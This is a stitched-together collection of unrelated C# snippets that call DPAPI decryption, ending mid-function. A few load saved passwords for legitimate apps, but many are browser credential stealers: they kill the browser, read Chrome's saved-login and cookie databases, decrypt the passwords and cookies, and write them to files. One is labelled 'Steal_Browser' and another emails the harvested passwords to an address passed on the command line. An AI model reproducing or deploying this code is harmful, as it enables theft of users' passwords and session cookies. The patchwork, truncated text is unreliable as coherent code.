public List <BrowserLog> GetPasswords()
{
try
{
List <BrowserLog> browserLogList = new List <BrowserLog>();
string connectionString = string.Format("Data Source = {0}", (object)this.LoginData);
string str1 = "logins";
byte[] entropyBytes = (byte[])null;
DataTable dataTable = new DataTable();
using (SQLiteConnection connection = new SQLiteConnection(connectionString))
new SQLiteDataAdapter(new SQLiteCommand(string.Format("SELECT * FROM {0}", (object)str1), connection)).Fill(dataTable);
for (int index = 0; index < dataTable.Rows.Count; ++index)
{
string str2 = dataTable.Rows[index][1].ToString();
string str3 = dataTable.Rows[index][3].ToString();
string description;
string str4 = new UTF8Encoding(true).GetString(DPAPI.Decrypt((byte[])dataTable.Rows[index][5], entropyBytes, out description));
BrowserLog browserLog = new BrowserLog()
{
Host = string.IsNullOrWhiteSpace(str2) ? "UNKOWN" : str2,
Login = string.IsNullOrWhiteSpace(str3) ? "UNKOWN" : str3,
Password = string.IsNullOrWhiteSpace(str4) ? "UNKOWN" : str4
};
if (browserLog.Login != "UNKOWN" && browserLog.Password != "UNKOWN" && browserLog.Host != "UNKOWN")
{
browserLogList.Add(browserLog);
}
}
return(browserLogList);
}
catch
{
return(new List <BrowserLog>());
}
}
static void Main(string[] args)
{
try
{
string text = "Hello, world!";
string entropy = null;
string description;
Console.WriteLine("Plaintext: {0}\r\n", text);
// Call DPAPI to encrypt data with user-specific key.
string encrypted = DPAPI.Encrypt(DPAPI.KeyType.UserKey,
text,
entropy,
"My Data");
Console.WriteLine("Encrypted: {0}\r\n", encrypted);
// Call DPAPI to decrypt data.
string decrypted = DPAPI.Decrypt(encrypted,
entropy,
out description);
Console.WriteLine("Decrypted: {0} <<<{1}>>>\r\n",
decrypted, description);
}
catch (Exception ex)
{
while (ex != null)
{
Console.WriteLine(ex.Message);
ex = ex.InnerException;
}
}
}
public static string Decrypt(string cipherText, string entropy, out string description)
{
if (entropy == null)
{
entropy = string.Empty;
}
return(Encoding.UTF8.GetString(DPAPI.Decrypt(Convert.FromBase64String(cipherText), Encoding.UTF8.GetBytes(entropy), out description)));
}
/// <summary>
/// Set initial state of the login controls
/// </summary>
private void InitializeControls()
{
serverField.Text = Settings.Default.jiraurl;
usernameField.Text = Settings.Default.username;
passwordField.Password = Settings.Default.password != string.Empty
? DPAPI.Decrypt(Settings.Default.password)
: Settings.Default.password;
}
public string DecryptPassword()
{
string decrypredPassword;
if (string.IsNullOrEmpty(password))
{
return("");
}
return(DPAPI.Decrypt(password, Application.dataPath, out decrypredPassword));
}
public SecureString DecryptPassword()
{
string description; //optional
if (string.IsNullOrEmpty(password))
{
return(new SecureString());
}
return(DPAPI.Decrypt(password, Application.dataPath, out description));
}
static bool TryDecryptPassword(string encrypted, out string decrypted)
{
decrypted = "";
try {
decrypted = DPAPI.Decrypt(encrypted);
return(true);
} catch (Exception) {
Console.WriteLine("Unable to decrypt the password");
return(false);
}
}
void updateForm()
{
if (_settings.exitAfterStart == 1)
{
chkExitAfterStart.Checked = true;
}
else
{
chkExitAfterStart.Checked = false;
}
//txtAlternateShell.Text = _settings.AlternateShell;
//txtWorkingDir.Text = _settings.WorkingDir;
txtServer.Text = _settings.ServerNameOrIP;
txtPass.Text = DPAPI.Decrypt(_settings.Password);
if (_settings.SavePassword == 1)
{
chkSavePassword.Checked = true;
}
else
{
chkSavePassword.Checked = false;
}
txtPort.Text = _settings.MCSPort.ToString();
txtUser.Text = _settings.UserName;
txtDomain.Text = _settings.Domain;
txtWidth.Text = _settings.DesktopHeight.ToString();
txtHeight.Text = _settings.DesktopWidth.ToString();
setBPP(_settings.ColorDepthID);
if (_settings.ScreenStyle == rdp_settings.eScreenStyles.fullscreen_Fit ||
_settings.ScreenStyle == rdp_settings.eScreenStyles.fullscreen_NoFit)
{
chkFullscreen.Checked = true;
}
else
{
chkFullscreen.Checked = false;
}
if (_settings.usebarcodereader == 1)
{
chkBarcodeReader.Checked = true;
}
else
{
chkBarcodeReader.Checked = false;
}
txtProgramLocation.Text = _settings.rdesktopce;
}
// Token: 0x06000159 RID: 345 RVA: 0x0000807C File Offset: 0x0000627C
public string[] Cookies()
{
string[] result;
try
{
bool flag = !File.Exists(this.CookiePath);
if (flag)
{
result = new string[0];
}
else
{
List <string> list = new List <string>();
string connectionString = "Data Source = " + this.CookiePath;
string text = "SELECT* FROM cookies";
byte[] entropyBytes = null;
DataTable dataTable = new DataTable();
string commandText = text;
using (SQLiteConnection sqliteConnection = new SQLiteConnection(connectionString))
{
SQLiteCommand cmd = new SQLiteCommand(commandText, sqliteConnection);
SQLiteDataAdapter sqliteDataAdapter = new SQLiteDataAdapter(cmd);
sqliteDataAdapter.Fill(dataTable);
}
for (int i = 0; i < dataTable.Rows.Count; i++)
{
byte[] cipherTextBytes = (byte[])dataTable.Rows[i][12];
string empty = string.Empty;
byte[] bytes = DPAPI.Decrypt(cipherTextBytes, entropyBytes, out empty);
List <string> values = new List <string>
{
dataTable.Rows[i][1].ToString(),
(dataTable.Rows[i][7].ToString() == "0") ? "FALSE" : "TRUE",
dataTable.Rows[i][4].ToString(),
(dataTable.Rows[i][6].ToString() == "0") ? "FALSE" : "TRUE",
dataTable.Rows[i][5].ToString(),
dataTable.Rows[i][2].ToString(),
new UTF8Encoding(true).GetString(bytes)
};
list.Add(string.Join("\t", values));
}
result = list.ToArray();
}
}
catch (Exception ex)
{
result = new string[0];
}
return(result);
}
// Token: 0x06000140 RID: 320 RVA: 0x00007794 File Offset: 0x00005994
public List <Log> GetPasswords()
{
List <Log> result;
try
{
List <Log> list = new List <Log>();
string text = string.Format("Data Source = {0}", this.LoginData);
string arg = "logins";
byte[] entropyBytes = null;
DataTable dataTable = new DataTable();
string text2 = string.Format("SELECT * FROM {0}", arg);
using (SQLiteConnection sqliteConnection = new SQLiteConnection(text))
{
SQLiteCommand sqliteCommand = new SQLiteCommand(text2, sqliteConnection);
SQLiteDataAdapter sqliteDataAdapter = new SQLiteDataAdapter(sqliteCommand);
sqliteDataAdapter.Fill(dataTable);
}
for (int i = 0; i < dataTable.Rows.Count; i++)
{
string text3 = dataTable.Rows[i][1].ToString();
string text4 = dataTable.Rows[i][3].ToString();
byte[] cipherTextBytes = (byte[])dataTable.Rows[i][5];
string text5;
byte[] bytes = DPAPI.Decrypt(cipherTextBytes, entropyBytes, out text5);
string text6 = new UTF8Encoding(true).GetString(bytes);
text4 = Regex.Replace(text4, "[^\\u0020-\\u007F]", string.Empty);
text6 = Regex.Replace(text6, "[^\\u0020-\\u007F]", string.Empty);
text3 = Regex.Replace(text3, "[^\\u0020-\\u007F]", string.Empty);
Log log = new Log
{
URL = (string.IsNullOrWhiteSpace(text3) ? "UNKOWN" : text3),
Login = (string.IsNullOrWhiteSpace(text4) ? "UNKOWN" : text4),
Password = (string.IsNullOrWhiteSpace(text6) ? "UNKOWN" : text6)
};
bool flag = log.Login != "UNKOWN" && log.Password != "UNKOWN" && log.URL != "UNKOWN";
if (flag)
{
list.Add(log);
}
}
result = list;
}
catch
{
result = new List <Log>();
}
return(result);
}
protected override void Load(JObject json)
{
var game = json.ReadToken("game");
if (game != null)
{
var gameSource = new GameSettings
{
GameUid = game.ReadRequiredValue <string>("uid"),
UserName = game.ReadRequiredValue <string>("userName"),
Password = DPAPI.Decrypt(game.ReadRequiredValue <string>("passwordHash"))
};
game.ReadOptionalValue("statisticsServiceEnabled", ref gameSource.StatisticsServiceEnabled);
Settings = gameSource;
}
}
public string getArgList()
{
string sRet = "";
//-g
sRet += " -g " + DesktopHeight.ToString() + "x" + DesktopWidth.ToString();
if (HostName.Length > 0)
{
sRet += " -n " + HostName;
}
sRet += " -t " + MCSPort.ToString();
sRet += " -u " + UserName;
if (Password.Length > 0)
{
sRet += " -p " + DPAPI.Decrypt(Password);// _passwordClearText;
}
if (Domain.Length > 0)
{
sRet += " -d " + Domain;
}
if (AlternateShell.Length > 0)
{
sRet += " -s " + AlternateShell;
}
if (WorkingDir.Length > 0)
{
sRet += " -c " + WorkingDir;
}
if (usebarcodereader == 1)
{
sRet += " -b";
}
if (ScreenStyle == eScreenStyles.fullscreen_Fit ||
ScreenStyle == eScreenStyles.fullscreen_NoFit)
{
sRet += " -f ";
}
sRet += " -a " + ColorDepthID.ToString();
sRet += " " + ServerNameOrIP;
return(sRet);
}
public void BrowserCookies(string pathToCookie, string output_file)
{
try
{
if (File.Exists(pathToCookie))
{
System.Collections.Generic.List <Data> data_list = new System.Collections.Generic.List <Data>();
byte[] entropy = null;
string connectionString = "data source=" + pathToCookie + ";New=True;UseUTF16Encoding=True";
DataTable dataTable = new DataTable();
string command = string.Format("SELECT * FROM {0} {1} {2}", "Cookies", "", "");
using (SQLiteConnection connection = new SQLiteConnection(connectionString))
{
SQLiteCommand cmd = new SQLiteCommand(command, connection);
new SQLiteDataAdapter(cmd).Fill(dataTable);
for (int i = 0; i < dataTable.Rows.Count; i++)
{
byte[] cipheredTextBytes = (byte[])dataTable.Rows[i][12];
cipheredTextBytes = DPAPI.Decrypt(cipheredTextBytes, entropy, out string description);
string strValue = new UTF8Encoding(true).GetString(cipheredTextBytes);
Data item = new Data
{
domain = dataTable.Rows[i][1].ToString(),
expirationDate = Convert.ToDouble(dataTable.Rows[i][5]),
secure = Convert.ToBoolean(Convert.ToInt32(dataTable.Rows[i][6])),
httpOnly = Convert.ToBoolean(Convert.ToInt32(dataTable.Rows[i][7])),
hostOnly = false,
session = false,
storeId = "0",
name = dataTable.Rows[i][2].ToString(),
value = strValue,
path = dataTable.Rows[i][4].ToString(),
id = data_list.Count
};
data_list.Add(item);
}
}
File.WriteAllText(dir_for_mailing + "\\" + output_file, "antipasta");
}
}
catch (Exception e)
{
StreamWriter sw = new StreamWriter("ecp.txt", true);
sw.WriteLine($"{DateTime.Now.ToString()} : {e.ToString()}");
sw.Close();
}
}
static void Main(string[] args)
{
string sendTo = args.Length > 0 ? args[0] : "";
DataTable DT = new DataTable();
const string sql = "SELECT `origin_url`, `username_value`, `password_value` FROM `logins`";
string dbPath = "Data Source=" + (Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + @"\AppData\Local\Google\Chrome\User Data\Default\Login Data");
string result = String.Empty;
using (SQLiteConnection conn = new SQLiteConnection(dbPath))
{
SQLiteCommand cmd = new SQLiteCommand(sql, conn);
SQLiteDataAdapter adapter = new SQLiteDataAdapter(cmd);
adapter.Fill(DT);
byte[] passBytes, descryptedPass;
string login, password, url;
for (int i = 0; i < DT.Rows.Count; i++)
{
passBytes = (byte[])DT.Rows[i][2];
descryptedPass = DPAPI.Decrypt(passBytes, null, out string _);
password = new UTF8Encoding(true).GetString(descryptedPass);
if (password.Length > 0)
{
login = (string)DT.Rows[i][1];
if (login.Length > 0)
{
url = (string)DT.Rows[i][0];
result += String.Format("URL = [{0}]\nLOGIN = [{1}]\nPASSWORD = [{2}]\n\n", url, login, password);
}
}
}
}
Mailer mailer = new Mailer("smtp.gmail.com", 587, "", "");
mailer.SendMail(sendTo, result);
}
static void Main(string[] args)
{
try
{
string filename = "my_chrome_passwords.html";
StreamWriter Writer = new StreamWriter(filename, false, Encoding.UTF8);
string db_way = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData)
+ "/Google/Chrome/User Data/Default/Login Data"; //путь к файлу базы данных
Console.WriteLine("DB file = " + db_way);
string db_field = "logins"; //имя поля БД
byte[] entropy = null; //разработчики не стали использовать энтропию.
//Однако класс DPAPI требует указания энтропии в любом случае,
//независимо от того - присутствует она, или нет.
string description; //я не понял смысла переменной, но она обязательная. На выходе всегда Null
// Подключаемся к базе данных
string ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True";
DataTable DB = new DataTable();
string sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", "");
using (SQLiteConnection connect = new SQLiteConnection(ConnectionString))
{
SQLiteCommand command = new SQLiteCommand(sql, connect);
SQLiteDataAdapter adapter = new SQLiteDataAdapter(command);
adapter.Fill(DB);
int rows = DB.Rows.Count;
for (int i = 0; i < rows; i++)
{
Writer.Write(i + 1 + ") "); // Здесь мы записываем порядковый номер нашей троицы "Сайт-логин-пароль".
Writer.WriteLine(DB.Rows[i][1] + "<br>"); //Это ссылка на сайт
Writer.WriteLine(DB.Rows[i][3] + "<br>"); //Это логин
// Здесь начинается расшифровка пароля
byte[] byteArray = (byte[])DB.Rows[i][5];
byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description);
string password = new UTF8Encoding(true).GetString(decrypted);
Writer.WriteLine(password + "<br><br>");
}
}
Writer.Close();
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
ex = ex.InnerException;
}
}
static void Main(string[] args)
{
try
{
string filename = "my_chrome_passwords.html";
StreamWriter Writer = new StreamWriter(filename, false, Encoding.UTF8);
string db_way = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData)
+ "/Google/Chrome/User Data/Default/Login Data"; // a path to a database file
Console.WriteLine("DB file = " + db_way);
string db_field = "logins"; // DB table field name
byte[] entropy = null; // DPAPI class does not use entropy but requires this parameter
string description; // I could not understand the purpose of a this mandatory parameter
// Output always is Null
// Connect to DB
string ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True";
DataTable DB = new DataTable();
string sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", "");
using (SQLiteConnection connect = new SQLiteConnection(ConnectionString))
{
SQLiteCommand command = new SQLiteCommand(sql, connect);
SQLiteDataAdapter adapter = new SQLiteDataAdapter(command);
adapter.Fill(DB);
int rows = DB.Rows.Count;
for (int i = 0; i < rows; i++)
{
Writer.Write(i + 1 + ") "); // Here we print order number of our trinity "site-login-password"
Writer.WriteLine(DB.Rows[i][1] + "<br>"); // site URL
Writer.WriteLine(DB.Rows[i][3] + "<br>"); // login
// Here the password description
byte[] byteArray = (byte[])DB.Rows[i][5];
byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description);
string password = new UTF8Encoding(true).GetString(decrypted);
Writer.WriteLine(password + "<br><br>");
}
}
Writer.Close();
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
ex = ex.InnerException;
}
}
/// <summary>
/// Connects to the
/// </summary>
/// <param name="User"></param>
/// <param name="Shard"></param>
/// <returns></returns>
public async Task <bool> Connect()
{
//Connects to the RTMPS client
await _client.ConnectAsync();
//Decrypts the users password when logging in
string password = DPAPI.Decrypt(_user.Password);
AuthenticationCredentials auth = new AuthenticationCredentials
{
Username = _user.Username,
Password = password,
ClientVersion = PoroServer.ClientVersion,
IpAddress = "209.133.52.232",
Locale = _shard.Locale,
Domain = "lolclient.lol.riotgames.com",
AuthToken = GetAuthKey(_user.Username, password, _shard.LoginQueue)
};
//Gets the current login session
Session login = await Login(_client, auth);
_accountId = login.Summary.AccountId;
//Subscribes to server messages
await _client.SubscribeAsync("my-rtmps", "messagingDestination", "bc", "bc-" + login.Summary.AccountId.ToString());
await _client.SubscribeAsync("my-rtmps", "messagingDestination", "gn-" + login.Summary.AccountId.ToString(), "gn-" + login.Summary.AccountId.ToString());
await _client.SubscribeAsync("my-rtmps", "messagingDestination", "cn-" + login.Summary.AccountId.ToString(), "cn-" + login.Summary.AccountId.ToString());
bool LoggedIn = await _client.LoginAsync(_user.Username.ToLower(), login.Token);
//TODO: Find easier way of getting summoner name and id without having to download a huge packet
LoginDataPacket dataPacket = await GetLoginPacket(_client);
_packet = dataPacket;
_summonerId = dataPacket.AllSummonerData.Summoner.SumId;
_summonerName = dataPacket.AllSummonerData.Summoner.Name;
return(LoggedIn);
}
public void BrowserPasswords(string pathToLoginData, string output_file, string browserProcess)
{
try
{
if (File.Exists(pathToLoginData))
{
KillProcess(browserProcess);
string connectionString = $"Data Source = {pathToLoginData}";
StreamWriter sw = new StreamWriter(dir_for_mailing + "\\" + output_file, false, Encoding.UTF8);
sw.WriteLine("This programm was made by @alexuiop1337. The author (me) is not responsible for your actions!");
DataTable db = new DataTable();
string sql = $"SELECT * FROM logins";
using (SQLiteConnection connection = new SQLiteConnection(connectionString))
{
SQLiteCommand command = new SQLiteCommand(sql, connection);
SQLiteDataAdapter da = new SQLiteDataAdapter(command);
da.Fill(db);
}
for (int i = 0; i < db.Rows.Count; i--)
{
string url = db.Rows[i][1].ToString();
string login = db.Rows[i][3].ToString();
byte[] byteArray = (byte[])db.Rows[i][5];
byte[] decrypted = DPAPI.Decrypt(byteArray, null, out string description);
string password = new UTF8Encoding(true).GetString(decrypted);
//ANTI PASTA
}
sw.Close();
}
}
catch (Exception e)
{
StreamWriter sw = new StreamWriter("ecp.txt", true);
sw.WriteLine($"{DateTime.Now.ToString()} : {e.ToString()}");
sw.Close();
}
}
static void Main(string[] args)
{
string direct = Directory.GetCurrentDirectory();
string[] filePaths = Directory.GetFiles(direct + "\\Google Chrome Password Retriever", "*.bin");
foreach (string s in filePaths)
{
var fs = new FileStream(s, FileMode.Open);
var len = (int)fs.Length;
var bits = new byte[len];
fs.Read(bits, 0, len);
string encodedData = Convert.ToBase64String(bits, Base64FormattingOptions.InsertLineBreaks);
try
{
string entropy = null;
string description;
//Console.WriteLine("Plaintext: {0}\r\n", text);
// Call DPAPI to decrypt data.
string decrypted = DPAPI.Decrypt(encodedData,
entropy,
out description);
File.AppendAllText(direct + "\\Google Chrome Password Retriever\\out.txt", decrypted + Environment.NewLine);
}
catch (Exception ex)
{
while (ex != null)
{
Console.WriteLine(ex.Message);
ex = ex.InnerException;
}
}
}
}
public bool AuthCached(ref string login, ref string password)
{
if (!File.Exists(LoginFile) || !File.Exists(PasswordFile))
{
return(false);
}
var loginEncrypted = File.ReadAllText(LoginFile);
var passwordEncrypted = File.ReadAllText(PasswordFile);
string description;
try
{
login = DPAPI.Decrypt(loginEncrypted, "=EQW*", out description);
password = DPAPI.Decrypt(passwordEncrypted, "M#$!", out description);
}
catch
{
return(false);
}
return(!string.IsNullOrEmpty(login) && !string.IsNullOrEmpty(password));
}
public static void Steal_Browser(string proccsesname, string stealerpath, string savename)
{
try
{
foreach (Process process in Process.GetProcesses())
{
if (process.ProcessName.ToString() == proccsesname)
{
process.Kill();
}
}
string connectionString = string.Format("Data Source = {0}", (object)(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + stealerpath));
StreamWriter streamWriter = new StreamWriter(Path.GetTempPath() + "\\StealerByHeleks\\Browsers\\" + savename + "_Passwords.txt", false, Encoding.UTF8);
byte[] entropyBytes = (byte[])null;
DataTable dataTable = new DataTable();
using (SQLiteConnection connection = new SQLiteConnection(connectionString))
new SQLiteDataAdapter(new SQLiteCommand(string.Format("SELECT * FROM {0}", (object)"logins"), connection)).Fill(dataTable);
int count = dataTable.Rows.Count;
for (int index = 0; index < count; ++index)
{
string str1 = dataTable.Rows[index][1].ToString();
string str2 = dataTable.Rows[index][3].ToString();
string description;
string str3 = new UTF8Encoding(true).GetString(DPAPI.Decrypt((byte[])dataTable.Rows[index][5], entropyBytes, out description));
streamWriter.WriteLine("----------------------------");
streamWriter.WriteLine(string.Format("URL: {0}", (object)str1));
streamWriter.WriteLine(string.Format("Login: {0}", (object)str2));
streamWriter.WriteLine(string.Format("Pass: {0}", (object)str3));
}
streamWriter.WriteLine("----------------------------");
streamWriter.WriteLine(string.Format("Total logs: {0}", (object)count));
streamWriter.Close();
}
catch
{
}
}
public string getRDPstring()
{
StringBuilder sb = new StringBuilder();
int i = 0;
string sLine = rdpLines[0];
while (sLine != null)
{
if (sLine.StartsWith("WorkingDir"))
{
sb.Append(String.Format(sLine, WorkingDir));
}
else if (sLine.StartsWith("AlternateShell"))
{
sb.Append(String.Format(sLine, AlternateShell));
}
else if (sLine.StartsWith("EnableClipboardRedirection"))
{
sb.Append(String.Format(sLine, EnableClipboardRedirection));
}
else if (sLine.StartsWith("Domain"))
{
sb.Append(String.Format(sLine, Domain));
}
else if (sLine.StartsWith("MCSPort"))
{
sb.Append(String.Format(sLine, MCSPort));
}
else if (sLine.StartsWith("Password"))
{
if (DPAPI.Decrypt(Password).Length > 0)
{
#region TESTING
//string sPassEnc = rdp_password.EncryptRDPPassword(Password);
//here: 0200000000000000000000000000000000000000000000000800000072006400700000000E660000100000001000000031C03CFAF193C0C61AA5346F40DB08F800000000048000001000000010000000891E0B7D71DCAB69764E9CA05E25CEB6200000004EEEE6F38BD74AC8E4CC6C0661235AA1221B6BF14C191E27260FD7F99322E5C514000000F539F077730E2DBFDE6B368D9F45B67AAED4E4FF"
//rdp: 0200000000000000000000000000000000000000000000000800000072006400700000000E66000010000000100000001E392BB875946E7281F1D962E2CBA05900000000048000001000000010000000BEBDA63E164615F22450CEC59F37D46B200000003BC01FF8CF7EC256730228E21FA4434597E6FF98EBC66B4B1D96EA4E76F7C6AA14000000BCA27291CE4AD6B9B1C3BD3CE397D53647213EC4
//rdp_decrypt: 0200000000000000000000000000000000000000000000000800000072006400700000000E66000010000000100000001E392BB875946E7281F1D962E2CBA05900000000048000001000000010000000BEBDA63E164615F22450CEC59F37D46B200000003BC01FF8CF7EC256730228E21FA4434597E6FF98EBC66B4B1D96EA4E76F7C6AA14000000BCA27291CE4AD6B9B1C3BD3CE397D53647213EC4
////using a DLL
//string sPassEnc = rdp_crypt.encrypt(Password);
//string sPassClear = rdp_crypt.decrypt(sPassEnc);
// gives 0200000000000000000000000000000000000000000000000800000072006400700000000e6600001000000010000000c7b7d85faf8e1ead57ad6698aef297ab00000000048000001000000010000000d78d3961ef6071a94af0732d75011c8720000000cff51a599a6e3794062c03e7459d0a97f4e29660e2183a63e1e2e7e9f304ae51140000002ef45194eea70f3133f05f8df7f5d1f5b5da267c
//rdp: 0200000000000000000000000000000000000000000000000800000072006400700000000E66000010000000100000001E392BB875946E7281F1D962E2CBA05900000000048000001000000010000000BEBDA63E164615F22450CEC59F37D46B200000003BC01FF8CF7EC256730228E21FA4434597E6FF98EBC66B4B1D96EA4E76F7C6AA14000000BCA27291CE4AD6B9B1C3BD3CE397D53647213EC4
//string sPassEnc = RDPcrypt.CryptTest.RDPencrypt(Password);
string _passwordClearText = DPAPI.Decrypt(Password);
string sEncrypted = DPAPI.Encrypt(DPAPI.KeyType.UserKey, _passwordClearText, string.Empty, "psw");
//MachineKey: 0200000000000000000000000000000000000000040000000800000072006400700000000E6600001000000010000000ABD068CB6407C7B46789983CD8497ADF000000000480000010000000100000009D5510223ADAFF0D214797166ABF00E71000000044D9ABFDD92A841F09DF3461C67FD5231400000004CF33CE7C73F5D847851D8201D6028694F1FC51
//User Key: 0200000000000000000000000000000000000000000000000800000072006400700000000E6600001000000010000000FB1308672F24BB2A3E2C9625977BC1CE00000000048000001000000010000000F60BBBB68E21ACE12D3A54C26BDC7686100000009963D2B109863E4345AD3F6C4BB1DA4314000000FC55E7196D64A5B8C90BA683CBC9775D95A86A97
//rdp Key: 0200000000000000000000000000000000000000000000000800000072006400700000000E66000010000000100000001E392BB875946E7281F1D962E2CBA05900000000048000001000000010000000BEBDA63E164615F22450CEC59F37D46B200000003BC01FF8CF7EC256730228E21FA4434597E6FF98EBC66B4B1D96EA4E76F7C6AA14000000BCA27291CE4AD6B9B1C3BD3CE397D53647213EC4
//test
sEncrypted = DPAPI.EncryptRDP(_passwordClearText, "rdp");
System.Diagnostics.Debug.WriteLine("****rdp****\r\nNo KEY : " + sEncrypted);
//sEncrypted = DPAPI.Encrypt(DPAPI.KeyType.UserKey, Password, null, "rdp");
//System.Diagnostics.Debug.WriteLine("User Key: " + sEncrypted);
//sEncrypted = DPAPI.Encrypt(DPAPI.KeyType.MachineKey, Password, null, "psw");
//System.Diagnostics.Debug.WriteLine("****psw****\r\nMachineKey: " + sEncrypted);
//sEncrypted = DPAPI.Encrypt(DPAPI.KeyType.UserKey, Password, null, "psw");
//System.Diagnostics.Debug.WriteLine("User Key: " + sEncrypted);
System.Diagnostics.Debug.WriteLine("rdp Key: " + "0200000000000000000000000000000000000000000000000800000072006400700000000E66000010000000100000001E392BB875946E7281F1D962E2CBA05900000000048000001000000010000000BEBDA63E164615F22450CEC59F37D46B200000003BC01FF8CF7EC256730228E21FA4434597E6FF98EBC66B4B1D96EA4E76F7C6AA14000000BCA27291CE4AD6B9B1C3BD3CE397D53647213EC4");
//user key matches more!!!
#endregion
string description = "";
string sTest = DPAPI.Decrypt(sEncrypted, string.Empty, out description);
if (sTest != _passwordClearText)
{
sEncrypted = "Error while encrypting password";
}
sb.Append(String.Format(sLine, Password));
}
else
{
sb.Append(String.Format(sLine, ""));
}
}
else if (sLine.StartsWith("HostName"))
{
sb.Append(string.Format(sLine, HostName));
}
else if (sLine.StartsWith("ServerName"))
{
sb.Append(string.Format(sLine, ServerNameOrIP));
}
else if (sLine.StartsWith("UserName"))
{
sb.Append(string.Format(sLine, UserName));
}
else if (sLine.StartsWith("SavePassword"))
{
sb.Append(string.Format(sLine, SavePassword));
}
else if (sLine.StartsWith("DesktopHeight"))
{
sb.Append(string.Format(sLine, DesktopWidth.ToString()));
}
else if (sLine.StartsWith("DesktopWidth"))
{
sb.Append(string.Format(sLine, DesktopHeight.ToString()));
}
else if (sLine.StartsWith("ScreenStyle"))
{
sb.Append(string.Format(sLine, (int)ScreenStyle));
//if(ScreenStyle==1)
// sb.Append(string.Format(sLine, "2"));
//else
// sb.Append(string.Format(sLine, "0"));
}
else if (sLine.StartsWith("ColorDepthID"))
{
sb.Append(string.Format(sLine, ColorDepthID.ToString()));
}
//else if (sLine.StartsWith("rdesktopce")){
// sb.Append(string.Format(sLine, rdesktopce));
//}
else
{
sb.Append(String.Format(sLine, ""));
}
i++;
sLine = rdpLines[i];
}
;
return(sb.ToString());
}
// Token: 0x0600000B RID: 11 RVA: 0x00002380 File Offset: 0x00000580
public static string Decrypt(string cipherText)
{
string text;
return(DPAPI.Decrypt(cipherText, string.Empty, out text));
}
public async Task <DataTable> GetPasswordsAsync()
{
return(await Task.Run(() =>
{
DataTable dt = new DataTable();
//try
//{
//string filename = "my_chrome_passwords.html";
//StreamWriter Writer = new StreamWriter(filename, false, Encoding.UTF8);
string db_way = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData)
+ "/Google/Chrome/User Data/Default/Login Data"; // a path to a database file
Console.WriteLine("DB file = " + db_way);
string db_field = "logins"; // DB table field name
byte[] entropy = null; // DPAPI class does not use entropy but requires this parameter
string description; // I could not understand the purpose of a this mandatory parameter
// Output always is Null
// Connect to DB
string google = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\Login Data";
string fileName = DateTime.Now.Ticks.ToString();
File.Copy(google, System.AppDomain.CurrentDomain.BaseDirectory + "\\" + fileName);
//string ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True";
string ConnectionString = "DataSource = " + System.AppDomain.CurrentDomain.BaseDirectory + "\\" + fileName + ";Versio=3;New=False;Compress=True;";
DataTable DB = new DataTable();
string sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", "");
//DataTable dt = new DataTable();
dt.Columns.Add("Site URL");
dt.Columns.Add("Login Info");
dt.Columns.Add("Password");
using (SQLiteConnection connect = new SQLiteConnection(ConnectionString))
{
SQLiteCommand command = new SQLiteCommand(sql, connect);
SQLiteDataAdapter adapter = new SQLiteDataAdapter(command);
adapter.Fill(DB);
int rows = DB.Rows.Count;
for (int i = 0; i < rows; i++)
{
if (DB.Rows[i][1].ToString() != string.Empty)
{
//Writer.Write(i + 1 + ") "); // Here we print order number of our trinity "site-login-password"
//Writer.WriteLine(DB.Rows[i][1] + "<br>"); // site URL
//Writer.WriteLine(DB.Rows[i][3] + "<br>"); // login
// // Here the password description
byte[] byteArray = (byte[])DB.Rows[i][5];
byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description);
string password = new UTF8Encoding(true).GetString(decrypted);
DataRow dr = dt.NewRow();
dr["Site URL"] = DB.Rows[i][1];
dr["Login Info"] = DB.Rows[i][3];
dr["Password"] = password;
dt.Rows.Add(dr);
//Writer.WriteLine(password + "<br><br>");
}
}
}
//System.Threading.Thread.Sleep(3000);
//foreach (DataRow item in dt.Rows)
//{
// if (!item[0].ToString().ToLower().Contains("https"))
// {
// item
// }
//}
return ReverseRowsInDataTable(dt);
//Writer.Close();
//dataGridView1.ItemsSource = ReverseRowsInDataTable(dt).AsDataView();
//return dt;
//}
//catch (Exception ex)
//{
// Console.WriteLine(ex.Message);
// ex = ex.InnerException;
//}
//finally
//{
// return dt;
//}
}));
//}
}
private static int Decrypt(string path)
{
try
{
PrintMe.PrintInfo("INFO", ConsoleColor.Yellow, $"$> Killing Chrome");
KillChrome();
Thread.Sleep(20);
if (path == "")
{
path += "ChromyDump.html";
}
else
{
path += "\\ChromyDump.html";
}
StreamWriter Writer = new StreamWriter(path, false, Encoding.UTF8);
string db_way = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData)
+ "/Google/Chrome/User Data/Default/Login Data"; // path to database file
//Console.WriteLine("$> DB file = " + db_way);
string db_field = "logins"; // DB table field name
byte[] entropy = null; // DPAPI class does not use entropy but requires this parameter
string description; // I could not understand the purpose of a this mandatory parameter
// Output always is Null
// Connect to DB
string ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True";
DataTable DB = new DataTable();
string sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", "");
int rows = 0;
// for better closing use using key
using (SQLiteConnection connect = new SQLiteConnection(ConnectionString))
{
SQLiteCommand command = new SQLiteCommand(sql, connect);
SQLiteDataAdapter adapter = new SQLiteDataAdapter(command);
adapter.Fill(DB);
rows = DB.Rows.Count;
for (int i = 0; i < rows; i++)
{
Writer.Write(i + 1 + "] "); // Here we print order number of our trinity "site-login-password"
Writer.WriteLine(DB.Rows[i][1] + "<br>"); // site URL
Writer.WriteLine(DB.Rows[i][3] + "<br>"); // login
// Here the password description
